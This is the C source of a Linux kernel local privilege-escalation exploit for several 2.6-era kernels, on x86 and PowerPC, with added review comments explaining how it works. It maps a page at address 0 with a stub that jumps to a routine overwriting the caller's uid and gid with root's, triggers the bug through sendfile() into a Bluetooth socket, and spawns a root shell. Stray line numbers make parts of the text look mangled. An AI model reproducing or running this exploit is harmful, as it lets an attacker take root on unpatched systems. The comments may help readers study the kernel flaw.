  1. * Linux 2.6.18-128.el5
  2. * Linux 2.6.9-89.EL
  3. * Ubuntu 8.10 Linux 2.6.27
 *
 * For i386 and 32-bit ppc, compile with:
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 and ppc64, compile with:
 * gcc -w -m64 -o exploit exploit.c
 * (-w silences compiler warnings, e.g. for the function-pointer-to-integer
 * casts below; the code is intentionally non-portable.)
 *
  11. * Greetz: r0073r,r4dc0re,side^effect
  12. *
  13. *
 * For educational purposes only.
  15. */
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <sys/mman.h>
  21. #include <sys/sendfile.h>
  22. #include <sys/types.h>
  23. #include <sys/socket.h>
  24. #include <unistd.h>
  25.  
/*
 * Kernel-style "always inline" attribute.  The register-reading helpers
 * below rely on being inlined into their caller (otherwise they would
 * report their own frame's stack pointer); guarded because some libc
 * headers may already define this macro.
 */
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
  29.  
  30. #if defined(__i386__) || defined(__x86_64__)
  31. #if defined(__LP64__)
/*
 * Return the current stack pointer (%rsp) on x86_64.
 *
 * Read with inline asm; because the function is always inlined the value
 * is the caller's stack pointer, which the task_struct probing relies on.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
	unsigned long sp;

	asm volatile ("movq %%rsp,%0; " : "=r" (sp));

	return sp;
}
  41.  
  42. #else
/*
 * Return the current stack pointer (%esp) on 32-bit x86.
 *
 * Read with inline asm; because the function is always inlined the value
 * is the caller's stack pointer, which the task_struct probing relies on.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
	unsigned long sp;

	asm volatile ("movl %%esp,%0" : "=r" (sp));

	return sp;
}
  52.  
  53. #endif
  54.  
  55. #elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Return the current stack pointer on PowerPC (32- and 64-bit).
 *
 * r1 is the stack pointer register in the PowerPC ABIs; it is copied out
 * with `mr`.  Always inlined so the value belongs to the caller's frame.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
	unsigned long sp;

	asm volatile ("mr %0,%%r1; " : "=r" (sp));

	return sp;
}
  65.  
  66. #endif
  67.  
  68. #if defined(__i386__) || defined(__x86_64__)
  69. #if defined(__LP64__)
/*
 * Return what the code treats as the current task_struct pointer on x86_64.
 *
 * Loads the 8 bytes at offset 0 of the %gs segment.  This is only
 * meaningful while executing in kernel context (the stub main() writes at
 * address 0 arranges that): %gs is presumed to point at the per-CPU area
 * whose first slot holds the current task pointer on the targeted kernels.
 * NOTE(review): that layout is not shown here — verify against the target
 * kernel.  Nothing is validated, unlike the 32-bit x86 and PowerPC variants.
 */
static __always_inline unsigned long
current_task_struct(void)
{
	unsigned long task_struct;

	asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));

	return task_struct;
}
  79.  
  80. #else
/* Value of task_struct->state for a runnable task; the probes below treat a
 * word equal to this as evidence that they found a task_struct. */
#define TASK_RUNNING 0

/*
 * Locate the current task_struct on 32-bit x86 by probing the kernel stack
 * (only meaningful when this runs in kernel context).
 *
 * First layout tried (2.6 kernels): thread_info sits at the 4 KiB-aligned
 * base of the stack and its first word is the task pointer.  A first word
 * >= 0xc0000000 is taken to be a kernel address (presumably the default
 * i386 PAGE_OFFSET; a different user/kernel split would need another
 * threshold) and the candidate is accepted if the word it points to —
 * assumed to be task_struct->state at offset 0 — equals TASK_RUNNING.
 *
 * Fallbacks: an 8 KiB-aligned stack base that is either the task_struct
 * itself (pre-2.6 layout, per the original comment) or a thread_info whose
 * first word is the task pointer.
 *
 * Returns the task_struct address, or (unsigned long)-1 when no probe
 * matches.  NOTE(review): -1 is not a null pointer, so the
 * `while (task_struct)` loop in change_cred() does not detect this failure
 * and would start scanning from 0xffffffff.
 */
static __always_inline unsigned long
current_task_struct(void)
{
	unsigned long task_struct, thread_info;

	thread_info = current_stack_pointer() & ~(4096 - 1);

	if (*(unsigned long *)thread_info >= 0xc0000000) {
		task_struct = *(unsigned long *)thread_info;

		/*
		 * TASK_RUNNING is the only possible state for a process that
		 * is executing in user space, so it doubles as a sanity check.
		 */
		if (*(unsigned long *)task_struct == TASK_RUNNING)
			return task_struct;
	}

	/*
	 * Prior to the 2.6 kernel series, the task_struct was stored at the end
	 * of the kernel stack.
	 */
	task_struct = current_stack_pointer() & ~(8192 - 1);

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	/* Otherwise treat the 8 KiB base as a thread_info holding the task. */
	thread_info = task_struct;

	task_struct = *(unsigned long *)thread_info;

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	return -1;
}
  119.  
  120. #endif
  121.  
  122. #elif defined(__powerpc__) || defined(__powerpc64__)
/* Value of task_struct->state for a runnable task; the probes below treat a
 * word equal to this as evidence that they found a task_struct. */
#define TASK_RUNNING 0

/*
 * Locate the current task_struct on PowerPC by probing the kernel stack
 * (only meaningful when this runs in kernel context).
 *
 * Rounds the stack pointer down to the assumed kernel stack size — 16 KiB
 * on ppc64, 8 KiB on ppc32 — and first treats that base as the task_struct
 * itself (accepted if its first word, assumed to be ->state, equals
 * TASK_RUNNING; the pre-2.6 layout described in the i386 variant), then as
 * a thread_info whose first word is the task pointer.
 *
 * Returns the task_struct address, or (unsigned long)-1 if neither probe
 * matches.
 *
 * NOTE(review): unlike the i386 variant there is no range check on the word
 * read from the stack base before it is dereferenced as a pointer, and -1
 * is non-null, so change_cred()'s `while (task_struct)` loop does not
 * notice the failure.
 */
static __always_inline unsigned long
current_task_struct(void)
{
	unsigned long task_struct, thread_info;

#if defined(__LP64__)
	/* ppc64: assumes 16 KiB kernel stacks. */
	task_struct = current_stack_pointer() & ~(16384 - 1);

#else
	/* ppc32: assumes 8 KiB kernel stacks. */
	task_struct = current_stack_pointer() & ~(8192 - 1);

#endif

	/* Stack base is the task_struct itself (older layout). */
	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	/* Otherwise the base is a thread_info whose first word is the task. */
	thread_info = task_struct;

	task_struct = *(unsigned long *)thread_info;

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	return -1;
}
  150.  
  151. #endif
  152.  
  153. #if defined(__i386__) || defined(__x86_64__)
/* Real uid/gid of the invoking process, captured in main() before the
 * trigger; change_cred() uses them as its search pattern. */
static unsigned long uid, gid;

/*
 * Overwrite the caller's credentials with root's (x86).
 *
 * Starting at what current_task_struct() returned, walks memory in 4-byte
 * steps until it finds eight consecutive 32-bit words equal to
 * uid,uid,uid,uid,gid,gid,gid,gid — presumably the uid/euid/suid/fsuid and
 * gid/egid/sgid/fsgid fields of the task's credentials (the struct layout
 * is not shown here) — and zeroes all eight.  Only the first match is
 * changed.
 *
 * Intended to run in kernel context, entered through the jump stub that
 * main() writes at address 0.  It reads the user-space globals uid/gid from
 * there, which presumes the kernel may dereference user pointers directly.
 *
 * Returns -1 unconditionally; the value is not used.
 *
 * NOTE(review): the loop has no upper bound — it stops only on a match or
 * when the pointer wraps to NULL — so a mismatched layout means an
 * unbounded read through kernel memory.  The -1 failure value of the
 * 32-bit current_task_struct() is non-null and is not detected either.
 * NOTE(review): uid/gid are unsigned long while the compared fields are
 * 32-bit; the comparison promotes task_struct[i], so ids < 2^32 still match.
 */
static int
change_cred(void)
{
	unsigned int *task_struct;

	task_struct = (unsigned int *)current_task_struct();

	while (task_struct) {
		/* Four words == uid followed by four words == gid. */
		if (task_struct[0] == uid && task_struct[1] == uid &&
		    task_struct[2] == uid && task_struct[3] == uid &&
		    task_struct[4] == gid && task_struct[5] == gid &&
		    task_struct[6] == gid && task_struct[7] == gid) {
			/* All eight become 0, i.e. root. */
			task_struct[0] = task_struct[1] =
			task_struct[2] = task_struct[3] =
			task_struct[4] = task_struct[5] =
			task_struct[6] = task_struct[7] = 0;
			break;
		}

		task_struct++;
	}

	return -1;
}
  180.  
  181. #elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Overwrite the caller's credentials with root's (PowerPC).
 *
 * Walks memory in 4-byte steps from what current_task_struct() returned,
 * skipping zero words, until it finds eight consecutive 32-bit words of the
 * shape a,a,a,a,b,b,b,b — presumably uid/euid/suid/fsuid followed by
 * gid/egid/sgid/fsgid (the struct layout is not shown here) — and zeroes
 * all eight.  Only the first match is changed.
 *
 * Intended to run in kernel context, entered via the stub that main()
 * writes at address 0.
 *
 * Returns -1 unconditionally; the value is not used.
 *
 * NOTE(review): unlike the x86 variant this does not compare against the
 * caller's actual ids (uid/gid are only captured on x86 in main()), so the
 * first non-zero 4+4 repeated pattern after the task_struct qualifies,
 * whether or not it is the credential block.  The loop is also unbounded:
 * it stops only on a match or when the pointer wraps to NULL, and the -1
 * failure value of current_task_struct() is non-null.
 */
static int
change_cred(void)
{
	unsigned int *task_struct;

	task_struct = (unsigned int *)current_task_struct();

	while (task_struct) {
		/* Skip zero words, presumably so zero padding (or ids that
		 * are already 0) cannot satisfy the pattern below. */
		if (!task_struct[0]) {
			task_struct++;
			continue;
		}

		/* Four equal words followed by four equal words. */
		if (task_struct[0] == task_struct[1] &&
		    task_struct[0] == task_struct[2] &&
		    task_struct[0] == task_struct[3] &&
		    task_struct[4] == task_struct[5] &&
		    task_struct[4] == task_struct[6] &&
		    task_struct[4] == task_struct[7]) {
			/* All eight become 0, i.e. root. */
			task_struct[0] = task_struct[1] =
			task_struct[2] = task_struct[3] =
			task_struct[4] = task_struct[5] =
			task_struct[6] = task_struct[7] = 0;
			break;
		}

		task_struct++;
	}

	return -1;
}
  213.  
  214. #endif
  215.  
/* Page size of the running system; re-evaluated on every use. */
#define PAGE_SIZE getpagesize()

/*
 * Entry point: map a page at address 0 holding a stub that jumps to
 * change_cred(), drive sendfile() from a temp file into a Bluetooth
 * datagram socket, then exec an interactive shell.
 *
 * Sequence:
 *   1. On x86, record the real uid/gid that change_cred() searches for.
 *   2. mmap() one RWX page at address 0 (MAP_FIXED).  This only succeeds
 *      where an unprivileged process may map page 0; kernels enforcing
 *      vm.mmap_min_addr (or an LSM doing the same) return EPERM and the
 *      program stops here.  NOTE(review): fd 0 is passed with
 *      MAP_ANONYMOUS; Linux ignores it, but -1 is the portable value.
 *   3. Write an arch-specific stub at address 0 that transfers control to
 *      change_cred():
 *        x86_64: ff 24 25 08 00 00 00 = jmp *0x8; bytes 8..15 hold the
 *                address of change_cred();
 *        i386:   ff 25 08 00 00 00    = jmp *0x8; bytes 8..11 hold it;
 *        ppc64:  the first word of change_cred's function descriptor (its
 *                entry address) is copied to address 0; the remaining
 *                descriptor words stay zero from the anonymous mapping;
 *        ppc32:  lis r31,hi; ori r31,r31,lo; mtctr r31; bctr.
 *   4. Create, unlink and truncate a temp file to one page so sendfile()
 *      has data to copy.
 *   5. sendfile() from the file into the socket.  The header above is
 *      truncated and does not name the bug; presumably this reaches a NULL
 *      function pointer in the socket's sendpage path, so control lands on
 *      the stub at address 0 and change_cred() runs with kernel privileges.
 *   6. execl() /bin/sh -i.
 *
 * NOTE(review): sendfile()'s return value is ignored, so on a patched or
 * otherwise unaffected kernel the shell is still spawned, just unprivileged.
 * NOTE(review): on ppc32, `(unsigned short)change_cred>>16` applies the
 * cast before the shift, so the half-word stored at bytes 2..3 (the lis
 * immediate) is always 0; `(unsigned short)((unsigned long)change_cred >>
 * 16)` is what was evidently intended.
 * NOTE(review): every other syscall failure is handled with perror()+exit.
 */
int
main(void)
{
	char *addr;
	int out_fd, in_fd;
	char template[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
	/* Real ids of this process: the pattern change_cred() looks for. */
	uid = getuid(), gid = getgid();

#endif

	/* Map page 0 RWX; fails with EPERM where mmap_min_addr is enforced. */
	if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
	    MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
		perror("mmap");
		exit(EXIT_FAILURE);
	}

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
	/* jmp *0x8 (ff 24 25 <disp32>); bytes 8..15 hold change_cred's address. */
	addr[0] = '\xff';
	addr[1] = '\x24';
	addr[2] = '\x25';
	*(unsigned long *)&addr[3] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#else
	/* jmp *0x8 (ff 25 <disp32>); bytes 8..11 hold change_cred's address. */
	addr[0] = '\xff';
	addr[1] = '\x25';
	*(unsigned long *)&addr[2] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
	/*
	 * The use of function descriptors by the Power 64-bit ELF ABI requires
	 * a fake function descriptor at address 0: copy change_cred's entry
	 * address (the first word of its descriptor) there.
	 */
	*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;

#else
	/* lis r31,hi16(change_cred) */
	addr[0] = '\x3f';
	addr[1] = '\xe0';
	/* NOTE(review): the cast binds before >>, so this always stores 0. */
	*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
	/* ori r31,r31,lo16(change_cred) */
	addr[4] = '\x63';
	addr[5] = '\xff';
	*(unsigned short *)&addr[6] = (unsigned short)change_cred;
	/* mtctr r31 */
	addr[8] = '\x7f';
	addr[9] = '\xe9';
	addr[10] = '\x03';
	addr[11] = '\xa6';
	/* bctr */
	addr[12] = '\x4e';
	addr[13] = '\x80';
	addr[14] = '\x04';
	addr[15] = '\x20';

#endif

#endif

	/* Destination socket; socket() fails unless the kernel has Bluetooth. */
	if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
		perror("socket");
		exit(EXIT_FAILURE);
	}

	/* One page of (zero) file data for sendfile() to push into the socket. */
	if ((in_fd = mkstemp(template)) == -1) {
		perror("mkstemp");
		exit(EXIT_FAILURE);
	}

	/* Unlink right away; the open descriptor keeps the file alive. */
	if(unlink(template) == -1) {
		perror("unlink");
		exit(EXIT_FAILURE);
	}

	if (ftruncate(in_fd, PAGE_SIZE) == -1) {
		perror("ftruncate");
		exit(EXIT_FAILURE);
	}

	/* Trigger.  NOTE(review): return value unchecked — see header comment. */
	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

	/* Spawned whether or not the credential change happened. */
	execl("/bin/sh", "sh", "-i", NULL);

	exit(EXIT_SUCCESS);
}
  308. # [2011-10-07]